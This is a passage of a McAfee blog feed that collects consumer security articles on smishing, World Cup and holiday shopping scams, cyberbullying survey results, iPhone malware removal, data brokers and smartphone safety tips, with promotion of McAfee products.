  • If you’re unsure whether a text message is legitimate, call the company or organization directly to verify. 

Filter unknown text messages

While you can’t avoid smishing attacks altogether, you can block spam text messages you receive on your mobile phone. iPhone and Android have cybersecurity tools like spam filters and phone number blocking to help protect you from phishing attacks and malicious links. 

To set up spam filters on your iPhone: 

  1. Go to the Settings App 
  2. Go to Messages 
  3. Find the Filter Unknown Senders option and turn it on 

To set up spam filters on your Android mobile device: 

  1. Go to the Messaging App 
  2. Choose Settings 
  3. Tap Spam Protection and turn on Enable Spam Protection 

Use McAfee Mobile Security 

McAfee Mobile Security is a mobile security app that helps protect your phone from malware, phishing attacks, and other online threats. McAfee Mobile Security is available for Android and iOS cell phones. 

One of the benefits of using McAfee Mobile Security is that it can help detect and block smishing attacks. With identity monitoring, McAfee Mobile Security monitors your sensitive information like email accounts, credit card numbers, phone numbers, Social Security numbers, and more to protect against identity theft. They notify you if they find any security breaches. 

Other benefits include: 

  • Antivirus 
  • Secure VPN for privacy online 
  • Identity monitoring for up to 10 emails 
  • Guard your identity against risky Wi-Fi connections 
  • Safe browsing 
  • System Scan for the latest updates 

Keep your device and information secure with McAfee Mobile Security

These days, our lives are more intertwined with our mobile devices than ever. We use them to stay connected with our loved ones on social media, conduct our business, and even access our most personal, sensitive data. It’s no surprise that mobile cybersecurity is becoming increasingly important. 

McAfee Mobile Security is a comprehensive security solution that helps protect your device from viruses, malware, and other online threats. It also offers a variety of other features, like a secure VPN to protect your credit card numbers and other personal data 

Whether you’re browsing your favorite website, keeping up with friends on social media, or shopping online at Amazon, McAfee Mobile Security provides the peace of mind that comes from knowing your mobile device is safe and secure. 

So why wait? Don‘t let the smishers win. Get started today with McAfee Mobile Security and rest easy knowing your mobile device and sensitive information are protected. 

The post What Is Smishing and Vishing, and How Do You Protect Yourself? appeared first on McAfee Blog.

]]>
Don’t Get Caught Offsides with These World Cup Scams https://www.mcafee.com/blogs/other-blogs/mcafee-labs/dont-get-caught-offsides-with-these-world-cup-scams/ Wed, 09 Nov 2022 12:03:27 +0000 https://www.mcafee.com/blogs/?p=161313

Authored by: Christy Crimmins and Oliver Devane Football (or Soccer as we call it in the U.S.) is the most...

The post Don’t Get Caught Offsides with These World Cup Scams appeared first on McAfee Blog.

]]>

Authored by: Christy Crimmins and Oliver Devane

Football (or Soccer as we call it in the U.S.) is the most popular sport in the world, with over 3.5 billion fans across the globe. On November 20th, the men’s World Cup kicks off (pun intended) in Qatar. This event, a tournament played by 32 national teams every four years, determines the sport’s world champion. It will also be one of the most-watched sporting events of at least the last four years (since the previous World Cup). 

An event with this level of popularity and interest also attracts fraudsters and cyber criminals looking to capitalize on fans’ excitement. Here’s how to spot these scams and stay penalty-free during this year’s tournament. 

New Cup, who’s this? 

Phishing is a tool that cybercriminals have used for years now. Most of us are familiar with the telltale signs—misspelled words, poor grammar, and a sender email whose email address makes no sense or whose phone number is unknown. But excitement and anticipation can cloud our judgment. What football fan wouldn’t be tempted to win a free trip to see their home team participate in the ultimate tournament? Cybercriminals are betting that this excitement will cloud fans’ judgment, leading them to click on nefarious links that ultimately download malware or steal personal information. 

It’s important to realize that these messages can come via a variety of channels, including email, text messages, (also known as smishing) and other messaging channels like WhatsApp and Telegram. No matter what the source is, it’s essential to remain vigilant and pause to think before clicking links or giving out personal or banking information.  

For more information on phishing and how to spot a phisher, see McAfee’s “What is Phishing?” blog. 

Real money for fake tickets 

According to ActionFraud, the UK’s national reporting center for fraud and cybercrime, thousands of people were victims of ticket fraud in 2019—and that’s just in the UK. Ticket fraud is when someone advertises tickets for sale, usually through a website or message board, collects the payment and then disappears, without the buyer ever receiving the ticket.  

 

The World Cup is a prime (and lucrative) target for this type of scam, with fans willing to pay thousands of dollars to see their teams compete. Chances are most people have their tickets firmly in hand (or digital wallet) by now, but if you’re planning to try a last-minute trip, beware of this scam and make sure that you’re using a legitimate, reputable ticket broker. To be perfectly safe, stick with well-known ticket brokers and those who offer consumer protection. Also beware of sites that don’t accept debit or credit cards and only accept payment in the form of bitcoin or wire transfers such as the one on the fake ticket site below:  

The red box on the right image shows that the ticket site accepts payment via Bitcoin.  

Other red flags to look out for are websites that ask you to contact them to make payment and the only contact information is via WhatsApp. 

Streaming the matches 

Let’s be realistic—most of us are going to have to settle for watching the World Cup from the comfort of our own home, or the pub down the street. If you’re watching the tournament online, be sure that you’re using a legitimate streaming service. A quick Google of “FIFA World Cup 2022 Official Streaming” along with your country should get you the information you need to safely watch the event through official channels. The FIFA site itself is also a good source of information.  

Illegal streaming sites usually contain deceptive ads and malware which can cause harm to your device.  

Don’t get taken to the bank 

In countries or regions where sports betting is legal, the 2022 World Cup is expected to drive an increase in activity. There’s no shortage of things to bet on, from a simple win/loss to the exact minute a goal will be scored by a particular player. Everything is subject to wager.   

As with our previous examples, this increase in legitimate gambling brings with it an increase in deceptive activity. Online betting scams often start when users are directed to or search for gambling site and end up on a fraudulent one. After placing their bets and winning, users realize that while they may have “won” money, they are unable to withdraw it and are even sometimes asked to deposit even more money to make winnings available, and even then, they still won’t be. By the end of this process, the bettor has lost all their initial money (and then some, potentially) as well as any personal information they shared on the site.  

Like other scams, users should be wary of sites that look hastily put together or are riddled with errors. Your best bet (yes, again, pun intended) is to look for an established online service that is approved by your government or region’s gaming commission. Finally, reading the fine print on incentives or bonuses is always a good idea. If something sounds too good to be true, it’s best to double-check. 

For more on how you can bet online safely, and for details on how legalized online betting works in the U.S., check out our blog on the topic.  

Keep that Connection Secure 

Using a free public Wi-Fi connection is risky. User data on these networks is unprotected, which makes it vulnerable to cyber criminals. Whether you’re traveling to Qatar for a match or watching the them with friends at your favorite pub, if you’re connecting to a public Wi-Fi connection, make sure you use a trusted VPN connection. 

Give scammers a straight red card this World Cup 

For more information on scams, visit our scam education page. Hopefully, with these tips, you’ll be able to enjoy and participate in some of the World Cup festivities, after all, fun is the goal!  

The post Don’t Get Caught Offsides with These World Cup Scams appeared first on McAfee Blog.

]]>
How Cyberbullying Looks In Australia in 2022 https://www.mcafee.com/blogs/family-safety/how-cyberbullying-looks-in-australia-in-2022/ Mon, 07 Nov 2022 11:19:15 +0000 https://www.mcafee.com/blogs/?p=161380

There’s no doubt that cyber bullying ranks towards the top of most parents ‘worry list’. As a mum of 4,...

The post How Cyberbullying Looks In Australia in 2022 appeared first on McAfee Blog.

]]>

There’s no doubt that cyber bullying ranks towards the top of most parents ‘worry list’. As a mum of 4, I can tell you it always came in my top five, usually alongside driving, drugs, cigarettes and alcohol! But when McAfee research in May revealed that Aussie kids experience the 2nd highest rate of cyberbullying out of the 10 countries interviewed, my heart skipped a beat. Clearly cyberbullying is a big problem for Aussie kids. Bigger than I had previously thought. But many of us parents had so many more questions: what can it look like? where does it happen? and could my child be a perpetrator? 

So, as an ally of connected families, McAfee set out to answer these questions so undertook more research through a detailed 10-country online questionnaire to 11,687 parents and their children in June. And the answers were quite revealing… 

What is Cyberbullying? 

Before we get into the results, let’s clarify what cyberbullying means. There is often a lot of confusion because let’s be honest, different kids have different tolerances, standards and cultural lenses for what is and isn’t acceptable behaviour. The definition of cyberbullying used in McAfee’s report was based on the definition by StopBullying.Gov:   

Cyberbullying is bullying that takes place over digital devices like cell phones, computers, and tablets. Cyberbullying can occur through SMS, Text, and apps, or online in social media, forums, or gaming where people can view, participate in, or share content. Cyberbullying includes sending, posting, or sharing negative, harmful, false, or mean content about someone else. It can include sharing personal or private information about someone else causing embarrassment or humiliation. Some cyberbullying crosses the line into unlawful or criminal behaviour.  

McAfee’s definition was then expanded to include specific acts of cyberbullying, such as: 

  • flaming – online arguments that can include personal attacks 
  • outing – disclosing someone’s sexual orientation without their consent  
  • trolling – intentionally trying to instigate a conflict through antagonistic messages 
  • doxing – publishing private or identifying information without someone’s consent  

Along with other acts, including:  

  • name calling  
  • spreading false rumours  
  • sending explicit images or messages  
  • cyberstalking, harassment, and physical threats  
  • exclusion from group chats and conversation 

What Is The Most Common Form of Cyberbullying for Aussie Kids? 

Even though racially motivated cyberbullying is on the rise, name-calling is the most common form of cyberbullying with 40% of kids globally reporting that they have been on the receiving end of it. Interestingly, in Australia, our kids receive this style of bullying more frequently, with 49% of Aussie kids affected.  

Exclusion from group chats and conversations is the 2nd most commonly reported form of cyberbullying with 36% of kids globally experiencing it. In Australia, this is higher at 42%. 

The spreading of false rumours rounds out the top three forms and was reported by 28% of children globally. Curiously, Aussie kids don’t seem to use this form just as commonly with just 24% affected. Japan stands out as the leader in this reported form of cyberbullying at 44% followed by Germany at 35% and India at 39%. 

1 in 8 Aussie kids reports receiving extreme cyberbullying threats eg stalking, harassment and physical threats online. This is in line with the global average however in India and the US, more young people are affected with 1 in 5 reporting this behaviour. 

Where Is Cyberbullying Taking Place? 

It’s All About Social Media 

It’s no surprise that the bulk of cyberbullying is happening on social media with 32% of kids affected globally. Group chats come in as the 2nd most commonplace with 24% of kids involved followed by online gaming being an issue for 22% of kids surveyed. 21% of kids experienced cyberbullying on websites and forums and 19% identified that they experienced cyberbullying via text messages.  

Globally, Facebook is the social media site where cyberbullying is most likely to occur. 53% of children report witnessing it and 50% report experiencing it. This is followed by Instagram (40% witnessing and 30% experiencing), YouTube, TikTok and then Twitter. 

Overall, Aussie kids appear to experience less cyberbullying on social media with just 47% witnessing it on Facebook and 37% experiencing it. Our kids also report lower levels on Instagram as well with 34% witnessing and 30% experiencing.  

Snapchat Is a Cyberbullying Hot Bed for Aussie Kids 

It appears that Snapchat is unfortunately where a lot of undesirable behaviour happens for our Aussie kids with 34% reporting that they have been affected on this platform – a huge 10% above the international average and the highest of any country included in the survey. 

Who’s Doing The Bullying? 

Most Cyberbullying Comes From Someone Known To The Victim 

I’m sure it’s not a surprise to many parents that most cyberbullying comes from someone known to the victim. In fact, 57% of kids worldwide confirmed this with just 45% nominating that the cyberbullying they received had been initiated by a stranger. And Aussie kids’ experiences reflect the global norm with 56% expressing that they also knew the perpetrator but only 36% experienced cyberbullying from a stranger. Interestingly, only India, reported more cyberbullying at the hands of strangers (70%) than by someone the child knows (66%). 

Most Kids Don’t Think They’ve Ever Been Cyberbullied But The Results Show Otherwise 

Globally, 81% of all children surveyed stated that they had never cyberbullied anyone while just 19% admitted that they had. But when questioned further, it became apparent that there may be some disconnect. In fact, when asked about specific cyberbullying behaviours, more than half of children worldwide (53%) admitted to committing one or more types of cyberbullying —perhaps indicating that their definition of cyberbullying differs from the clinically accepted definition. The most common acts that they admitted to included making a joke at someone else’s expense (22%), name-calling (18%) and excluding someone from a chat or conversation (15%).  

Are Aussie Kids and Parents Worried? 

It appears that our kids are calmer about the state of cyberbullying that their peers worldwide. Only 46% of our kids reported they were more concerned about being cyberbullied now than last year, compared to a 59% average worldwide. Aussie children said they are among the least concerned children in the world, alongside Canada at 44%, the U.K. at 43%, and Germany at 38%. 

And Aussie parents also appear calmer than parents from other countries with only 61% nominating they were more concerned about their child being cyberbullied today versus last year, compared to the 72% international average.  Australian parents also showed the least level of worry that their child may be a cyberbully. Only 41% said that they worried this was more likely this year than last, compared to 56% of parents elsewhere. 

Now, this could be because the online learning and tech-heavy phase of the pandemic is, thankfully, over and we are not as focussed on technology-related issues. Or perhaps it’s because we really are a nation of ‘laid-back’ types! The jury is still out… 

What Do We Do About It? 

We all know that it’s impossible to fix a problem if you don’t truly understand it. So, while these statistics might be a little overwhelming, please soak them in. Appreciating the complexities of this problem and digesting how cyberbullying can look and impact our kids is essential. Now, as first-generation digital parents, it may take us a little longer to wrap our heads around it and that’s ok. The most important thing is that we commit to understanding the problem so that we are in the best position possible to support and guide our kids. 

In my next blog post, I will be sharing more detailed strategies that will help you minimise the risk of your child becoming a victim of cyberbullying. I will also include advice on what to do if your child is affected by cyberbullying plus what to do if your child is in fact a cyberbully. 

‘Till next time. 

Stay Safe Online 

Alex  

The post How Cyberbullying Looks In Australia in 2022 appeared first on McAfee Blog.

]]>
A Guide to Remove Malware From Your iPhone https://www.mcafee.com/blogs/tips-tricks/a-guide-to-remove-malware-from-your-iphone/ Sun, 06 Nov 2022 13:25:40 +0000 https://www.mcafee.com/blogs/?p=159857

Malicious software, or “malware,” refers to any program designed to infect and disrupt computer systems and networks. The risks associated...

The post A Guide to Remove Malware From Your iPhone appeared first on McAfee Blog.

]]>

Malicious software, or “malware,” refers to any program designed to infect and disrupt computer systems and networks. The risks associated with a malware infection can range from poor device performance to stolen data. 

However, thanks to their closed ecosystem, built-in security features, and strict policies on third-party apps, Apple devices tend to be less prone to malware infections compared to their Android counterparts. But it’s important to note that they’re not completely without vulnerabilities 

Several iPhone viruses could infect your smartphone and affect its functionality, especially if you jailbreak your iPhone (that is, opening your iOS to wider features, apps, and themes).  

This article covers how you can detect malware infections and how to remove viruses from your device so you can get back to enjoying the digital world. 

How does malware affect iPhones?

Malware can affect your iPhone in a variety of ways. Here are a few telltale signs that your iPhone might have an unwelcome visitor.  

  • Your iPhone’s battery life is shorter than usual. 
  • Pop-up ads frequently appear. 
  • Apps crash for no apparent reason. 
  • Unfamiliar apps are installed on your iPhone. 
  • You notice high data usage. 
  • The operating system is noticeably slow. 
  • Your iPhone is overheating. 

How to check your iPhone for malware

If you notice any of the signs above, it’s a good idea to check for malware. Here are some steps you can take. 

  1. Look for unfamiliar apps. If you’re anything like the average smartphone user, you’ve probably downloaded dozens (if not hundreds) of apps. The sheer number of programs on your iPhone makes it easy for malicious apps to hide in plain sight and remain undetected for a long time. Take some time to swipe through all of your apps and closely inspect any that you don’t remember downloading or installing. 
  2. Check your data usage. Heavy data usage can be a sign of a malware infection, which is why you should keep an eye on it if you suspect a virus is in your system. To do so, go to Settings > Mobile Data and check if your data usage is higher than usual. 
  3. Check power consumption. Some types of malware run in the background and consume a significant amount of power without you noticing. To make sure that no such apps are installed on your phone, head over to Settings > Battery and select a period of your choice. Uninstall any unfamiliar apps that stand out. 
  4. Keep an eye on pop-up ads. Running into pop-up ads is inevitable when browsing the internet. However, your phone might be infected with adware if you’re getting them at an alarming frequency. 
  5. Scan your phone using antivirus software. As helpful as these steps are, running a complete scan using antivirus software is one of the most effective ways to detect malware. If you don’t have one installed already, consider using McAfee Mobile Security. This comprehensive security solution provides full-scale protection that includes a safe browsing feature to protect your digital life, Wi-Fi privacy, and a VPN for a more secure internet connection. Highly effective scans detect malicious apps and unwanted visitors before they enter your digital space. 

How to remove malware from your iPhone

If you’ve confirmed malware on your iPhone, don’t worry. There’s still time to protect yourself and your data. Below is an action plan you can follow to remove malware from your device. 

Update your iOS (if applicable)

In many cases, hackers exploit outdated versions of iOS to launch malware attacks. If you don’t have the latest version of your operating system, it’s a good idea to update iOS to close this potential vulnerability. Just follow these steps: 

  1. Go to Settings. 
  2. Click on General. 
  3. Click on Software Update. 
  4. Follow the instructions to update your iPhone. 

Restart your device

It might sound simple, but restarting your device can fix certain issues. The system will restart on its own when updating the iOS. If you already have the latest version, restart your iPhone now. 

Clear your iPhone browsing history and data

If updating the iOS and restarting your device didn’t fix the issue, try clearing your phone’s browsing history and data. If you’re using Safari, follow these steps: 

  1. Go to Settings. 
  2. Click on Clear History and Website Data 
  3. Click on Clear History and Data 

Keep in mind that the process is similar for Google Chrome and most other popular web browsers. 

Remove any suspicious apps

Malicious software, such as spyware and ransomware, often end up on phones by masquerading as legitimate apps. To err on the side of caution, delete any apps that you don’t remember downloading or installing. 

Restore your iPhone

The option to restore to a previous backup is one of the most valuable features found on the iPhone and iPad. Essentially, this allows you to restore your device to an iCloud backup made before the malware infection 

Here’s how: 

  1. Go to Settings. 
  2. Click on General. 
  3. Click on Transfer or Reset iPhone. 
  4. Choose Erase All Content and Settings. 
  5. Choose Restore from iCloud Backup. 

Factory reset your iPhone

If none of the steps above solves the problem, a factory reset might be the next order of business. Restoring your phone to factory settings will reset it to its out-of-factory configuration, deleting all of your apps, content, and settings in the process and replacing them with original software only. 

To factory reset your iPhone, follow these steps: 

  1. Go to Settings. 
  2. Click on General.  
  3. Click on Transfer or Reset iPhone 
  4. Choose Erase All Content and Settings. 
  5. Choose Set Up as New iPhone. 

How to keep your iPhone safe from malware

The best way to protect your iOS device is to avoid malware in the first place. Follow these security measures to safeguard your device: 

  • Don’t click on suspicious links. 
  • Don’t install apps that Apple doesn’t recognize. 
  • Only download apps from the App Store. 
  • Don’t jailbreak your iPhone, as this will remove most Apple security features. 
  • Enable automatic updates for iOS and iTunes to stay in line with Apple’s security updates and bug fixes. 
  • Keep frequent data backups. 
  • Avoid engaging with suspicious text messages on iMessage, as hackers use them to spread phishing scams. 

Secure your iPhone with McAfee Mobile Security 

If you have an iPhone and are like most other people, you probably use your device for almost everything you do online. And while it’s amazing to have the internet in the palm of your hands, it’s also important to be aware of online threats like malware, which can put your digital life at risk. 

The good news is that McAfee has your back with our award-winning and full-scale mobile security app. McAfee Mobile Security provides full protection against various types of malware targeting the Apple ecosystem. With safe browsing features, a secure VPN, and antivirus software, McAfee Security for iOS delivers protection against emerging threats, so you can continue to use your iPhone with peace of mind. 

Download the McAfee Security app today and get all-in-one protection. 

The post A Guide to Remove Malware From Your iPhone appeared first on McAfee Blog.

]]>
How much of your personal info is available online? A simple search could show you plenty. https://www.mcafee.com/blogs/privacy-identity-protection/how-much-of-your-personal-info-is-available-online-a-simple-search-could-show-you-plenty/ Thu, 03 Nov 2022 09:39:45 +0000 https://www.mcafee.com/blogs/?p=161261

What you paid for your home, who lives there with you, your age, your children, your driving record, education, occupation,...

The post How much of your personal info is available online? A simple search could show you plenty. appeared first on McAfee Blog.

]]>

What you paid for your home, who lives there with you, your age, your children, your driving record, education, occupation, estimated income, purchasing habits, and any political affiliations you may have—all pretty personal information, right? Well, there’s a good chance that anyone can find it online. All it takes is your name and address.  

Thankfully, there’s something you can do about it. 

But first, go ahead and give it a try. Type your name and address in a search bar and see what comes up. If you’re like most people, your search results turned up dozens of sites with your information on them. Some sites offer bits of it for free. Other sites offer far more detailed information, for a price.  

Who’s behind all this? Data brokers. All part of a global data economy estimated at $200 billion U.S. dollars a year fueled by thousands of data points on billions of people scraped from public records, social media, third-party sources, and sometimes other data broker sites as well.  

The result? A chillingly accurate picture of you.  

So accurate, that reporters and law enforcement will often use profiles from data broker sites to dig up a person’s background. And so could scammers and thieves.  

Data brokers—a primary resource for spammers, scammers, and thieves 

Ever wonder how you end up with all those spam calls and texts? Look no further than the data brokers. They help scammers compile the calling and texting lists they use. Yet spammy calls and texts are just part of the problem with these sites. They can give thieves the tools they need to steal your identity.  

How? Visualize your identity as a jigsaw puzzle. Every bit of personal information makes up a piece, and if you cobble enough pieces together, a scammer or thief could have enough information to steal your identity. And data brokers compile all those pieces in one place and offer up them up in droves. 

If you’re wondering if this activity is legal or at least regulated in some way, it largely isn’t. For example, the U.S. has no federal laws that require data brokers to remove personal information from their sites if requested to do so. On the state level, Nevada, Vermont, and California have legislation in place aimed at protecting consumers from having their data disclosed on these sites. Other legislation is being considered, yet as of this writing there’s very little on the books right now. 

With next to no oversight, data brokers continue to collect personal information, which may or may not be accurate. It may be out of date or flat out wrong. Likewise, as it is with any large data store, data brokers are subject to hacks and attacks, which may lead to breaches that release detailed personal information onto the dark web and into the hands of bad actors. 

Put plainly, data brokers collect, buy, and sell high volumes of personal information, often in ways that leave no trace that it’s happening to you—or that the information is correct in any way. 

Removing your name and information from data broker sites 

All this can feel like it’s out of your control. And maybe the search you did on yourself made you a little uneasy. (Understandable!) Yet you have plenty of ways you can curb this activity and even remove your information from some of the riskiest data broker sites as well.  

It starts by finding out which sites have information on you, followed by filing requests to have it removed. Yet with dozens and dozens of these sites proliferating online, this can be a time-consuming process. Not to mention a frustrating one. We created McAfee+ so people can not only be safe but feel safe online, particularly in a time when there’s so much concern about identity theft and invasion of our online privacy.  McAfee+ contains a comprehensive set of tools, such as Personal Data Cleanup which are designed to help protect your online privacy. 

Personal Data Cleanup scans some of the riskiest data broker sites and shows you which ones are selling your personal info. It also provides guidance on how you can remove your data from those sites and can even manage the removal for you depending on your plan. ​ 

And because getting your info removed once isn’t a guarantee that a data broker won’t collect and post it again, Personal Data Cleanup can continually monitor those sites. So should your info get posted again, you can request its removal again as well. 

Seven ways you can keep your personal information from data brokers 

The other way you can thwart data brokers involves cleaning up your tracks when you go online, essentially leaving a smaller amount of data in your wake that they can collect and resell. 

  1. Use a VPN: A VPN is a Virtual Private Network, which protects your data and privacy online by creating an encrypted tunnel that makes your activity far more anonymous than without one. Classically, it’s a great way to shield your information from crooks and snoops while you’re banking, shopping, or handling any kind of sensitive information online. However, it has some terrific privacy benefits as well because it makes your time online more private by reducing the personal information that others can collect and track—including data brokers.
  2. Make your social media profile private: Public social media profiles provide data brokers with an absolute goldmine of personal information. If you’ve filled out things like your employer, school, spouse, and so on, data brokers will grab it. They may also cull your interests, likes, and groups for even more profiling information. While we’ve always recommended setting your profile private for friends and family only, data brokers and all their snooping make setting it to private all that more important. 
  3. Think twice about using loyalty cards: Whether it’s at your drug store, supermarket, or any number of other retailers, the “discount” you get with a loyalty card may come with a price—your personal information. Data brokers buy and sell purchasing histories to round out the personal profiles they create. If you’d rather keep data brokers from knowing what things you buy, make your purchases without your loyalty card. In all, it’s a tradeoff. Is the discount worth the potential hit to your privacy?
  4. Refuse those cookies: Thanks in large part to the General Data Protection Regulation (GDPR) in the European Union, many websites now prompt their visitors with options for tracking cookies. If you’ve come across these prompts already you know that they’re hard to miss. Once you click on them, you have the option to select only the most necessary, functional cookies—and if you’d like to enable other cookies for convenience and perhaps marketing purposes. Here, the most private bet is to enable the absolute minimum, which can prevent further information from ending up in the hands of data brokers.
  5. Turn off location services for your smartphone apps: Just like real estate brokers, data brokers are all about “location, location, location.” By not only knowing what you’re doing but where you’re doing it too gives them that much more insight into your travels and behaviors. Advertisers particularly love location data and will create highly targeted ad campaigns based on where you’re going and where you are. One source for this location data are your apps. Depending on the app and the user agreement in place, various apps may collect and share location information. Head to your phone’s settings and disable your location services app-by-app, keeping it enabled for only the most necessary of apps and for only while using the app.
  6. Turn off your phone’s Wi-Fi and Bluetooth when you’re not using them: Some retailers use “passive tracking” technologies while you’re in or nearby their stores. It works by tapping into your Wi-Fi or Bluetooth connections as they search for networks and devices they can pair with. Retailers have sensors that they can connect to, which then collect data. With that data they can determine several things, like when their stores see the most traffic, what the most popular items and displays are, or if you simply walk by the storefront and don’t enter. And because each smartphone has its own unique identifier, a MAC number (Media Access Control), there’s the possibility they can associate you with your phone. This one has a simple fix. Turn off your Wi-Fi and Bluetooth when you’re not using them so you can’t be tracked.
  7. Install and use online protection software: By protecting your devices, you protect what’s on them, like your personal information. Comprehensive online protection software can protect your identity in several ways, like create and manage the strong, unique passwords and provide further services that monitor and protect your identity—in addition to digital shredders that can permanently remove sensitive documents (simply deleting them won’t do that alone.) 

Get your personal info back in your hands where it belongs 

Searching for your name and address can turn up some surprises and introduce you to the world of data brokers, the dozens and dozens of companies that collect, buy, and sell your personal information. While data brokers sell this information to companies for advertising and marketing purposes, they will also sell that information to hackers, scammers, and thieves. Simply put, they don’t discriminate when selling your personal info. That puts more than just your privacy at risk, it can put your identity at risk as well. By selling your personal information, it can give bad actors the info they need to commit identity fraud and theft.  

While cleaning up personal information from these sites is often a difficult and time-consuming task, tools like our Personal Data Cleanup can now dig out the sites where your personal info is posted and can help you remove it. Moreover, you now have several tricks and tactics you can use to reduce the amount of personal data these sites can collect. In all, you now have far more control over what data brokers can collect, buy, and sell than you had before. And now is most certainly a time to take that control given all the time we spend online and the many ways we rely on it to help us work, play, and simply get things done. 

The post How much of your personal info is available online? A simple search could show you plenty. appeared first on McAfee Blog.

]]>
7 Tips to Protect Your Smartphone from Getting Hacked https://www.mcafee.com/blogs/mobile-security/7-tips-to-protect-your-smartphone-from-getting-hacked/ Tue, 01 Nov 2022 13:00:53 +0000 /blogs/?p=123478

There’s little rest for your hard-working smartphone. If you’re like many professionals today, you use it for work, play, and a mix of personal...

The post 7 Tips to Protect Your Smartphone from Getting Hacked appeared first on McAfee Blog.

]]>

There’s little rest for your hard-working smartphone. If you’re like many professionals today, you use it for work, play, and a mix of personal business in between. Now, what if something went wrong with that phone, like loss or theft? Worse yet, what if your smartphone got hacked? Let’s try and keep that from happening to you. 

Globally, plenty of people pull double duty with their smartphones. In Spain, one survey found that 55% of people use the same phone for a mix of personal and and work activity. The same survey showed that up to half of people interviewed in Japan, Australia, and the U.S. do so as well, while nations like the UK and Germany trailed at 31% and 23% respectively. 

Whether these figures trend on the low or high end, the security implications remain constant. A smartphone loaded with business and personal data makes for a desirable target. Hackers target smartphones because they’re often unprotected, which gives hackers an easy “in” to your personal information and to any corporate networks you may use.  It’s like two hacks with one stone.  

Put simply, as a working professional with a smartphone, you’re a high-value target.  

Protect your smartphone from being hacked 

As both a parent and a professional, I put together a few things you can do to protect your smartphone from hacks so that you can keep your personal and work life safe: 

1. Add extra protection with your face, finger, pattern, or PIN. 

First up, the basics. Locking your phone with facial ID, a fingerprint, pattern or a pin is your most basic form of protection, particularly in the event of loss or theft. (Your options will vary depending on the device, operating system, and manufacturer.) Take it a step further for even more protection. Secure the accounts on your phone with strong passwords and use two-factor authentication on the apps that offer it, which doubles your line of defense.    

2. Use a VPN. 

Or, put another way, don’t hop onto public Wi-Fi networks without protection. A VPN masks your connection from hackers allowing you to connect privately when you are on unsecure public networks at airports, cafes, hotels, and the like. With a VPN connection, you’ll know that your sensitive data, documents, and activities you do are protected from snooping, which is definitely a great feeling given the amount of personal and professional business we manage with our smartphones. 

3. Stick to the official app stores for your apps.

Both Google Play and Apple’s App Store have measures in place to help prevent potentially dangerous apps from making it into their stores. Malicious apps are often found outside of the app stores, which can run in the background and compromise your personal data like passwords, credit card numbers, and more—practically everything that you keep on your phone. Further, when you are in the app stores, look closely at the descriptions and reviews for apps before you download them. Malicious apps and counterfeits can still find their way into stores, and here are a few ways you can keep those bad apps from getting onto your phone.    

4. Back up the data on your phone. 

Backing up your phone is always a good idea for two reasons: 

  • First, it makes the process of transitioning to a new phone easy by transferring that backed up data from your old phone to your new phone. 
  • Second, it ensures that your data stays with you if your phone is lost or stolen—allowing you to remotely wipe the data on your lost or stolen phone while still having a secure copy of that data stored in the cloud.  

Both iPhones and Android phones have straightforward ways of backing up your phone regularly. 

5. Learn how to lock or wipe your phone remotely in case of emergency. 

Worst case scenario—your phone is gone. Really gone. Either it’s hopelessly lost or got stolen. What now? Lock it remotely or even wipe its data entirely. While that last bit about wiping the phone seems like a drastic move, if you maintain regular backups as mentioned above, your data is secure in the cloud—ready for you to restore. In all, this means that hackers won’t be able to access you, or your company’s, sensitive information—which can keep you out of trouble and your professional business safe. Apple provides iOS users with a step-by-step guide for remotely wiping devices, and Google offers up a guide for Android users as well. 

6. Get rid of old apps—and update the ones you keep. 

We all download apps, use them once, and then forget they are on our phone. Take a few moments to swipe through your screen and see which ones you’re truly done with and delete them along with their data. Some apps have an account associated with them that may store data off your phone as well. Take the extra step and delete those accounts so any off-phone data is deleted.  

The reason for this is that every extra app is another app that needs updating or that may have a security issue associated with it. In a time of data breaches and vulnerabilities, deleting old apps is a smart move. As for the ones you keep, update them regularly and turn on auto-updates if that’s an option. Updates not only introduce new features to apps, but they also often address security issues too. 

7. Protect your phone. 

With so much of your life on your phone, getting security software installed on it can protect you and the things you keep on your phone. Whether you’re an Android owner or iOS owner, mobile security software can keep your data, your shopping, and payments secure. 

The post 7 Tips to Protect Your Smartphone from Getting Hacked appeared first on McAfee Blog.

]]>
The Worst Black Friday and Cyber Monday Scams – And How to Avoid Them https://www.mcafee.com/blogs/privacy-identity-protection/the-worst-black-friday-and-cyber-monday-scams-and-how-to-avoid-them/ Tue, 01 Nov 2022 09:51:41 +0000 https://www.mcafee.com/blogs/?p=161073

On Black Friday and Cyber Monday, the deals roll out. So do some of the worst Black Friday and Cyber...

The post The Worst Black Friday and Cyber Monday Scams – And How to Avoid Them appeared first on McAfee Blog.

]]>

On Black Friday and Cyber Monday, the deals roll out. So do some of the worst Black Friday and Cyber Monday scams. 

Hackers, scammers, and thieves look to cash in this time of year by blending in with the holiday rush, spinning up their own fake shipping notices, phony deals, and even bogus charities that look legitimate at first glance, yet are anything but. Instead, they may be loaded with malware, point you to phishing sites that steal your personal info, or they may simply rip you off.   

Classically, many online scams play on emotions by creating a sense of urgency or even fear. And for the holidays, you can throw stress into that mix as well—the stress of time, money, or even the pressure of finding that hard-to-get gift that seems to be out of stock everywhere. The bad actors out there will tailor their attacks around these feelings, hoping that they’ll catch you with your guard down during this busy time of year. 

”The Five Least Wanted” – Top online shopping scams to avoid 

So while knowing how to spot a great gift at a great price is solid skill to have this time of year, so is the ability to spot a scam. Let’s look at some of the worst ones out there, along with what you can do to steer clear of them. 

1) The fake order scam  

Come this time of year, keeping tabs on all the packages you have in transit can get tricky. You may have an armload of them enroute at any given time, and scammers will look to slip into this mix with phony order confirmations sent to your mailbox or your phone by text. Packed with either an email attachment or a link to a bogus website, they’ll try to get you to download malware or visit a site that attempts to steal your identity.  

These messages can look quite legit, so the best way to keep track of your orders is on the sites where you purchased them. Go directly to those sites rather than clicking on any links or attachments you get. 

2) The phony tracking number scam 

This scam plays out much like the fake order scam, yet in this case the crooks will send a phony package tracking notification, again either as a link or as an attachment. For starters, legitimate retailers won’t send tracking numbers in an attached file. If you see anything like that, it’s surely a scam designed to inject malware onto your device. In the case of a link, the scammers aim to send you to a site that will steal your personal info, just like in the case above.  

Once again, the best way to track your packages is to go to the source. Visit the online store where you made your purchase, open your current orders, and get your package tracking information from there. 

3) The bogus website scam  

A classic scammer move is to “typosquat” phony email addresses and URLs that look awfully close to legitimate addresses of legitimate companies and retailers. So close that you may overlook them. They often appear in phishing emails and instead of leading you to a great deal, these can in fact link you to scam sites that can then lift your login credentials, payment info, or even funds should you try to place an order through them.  

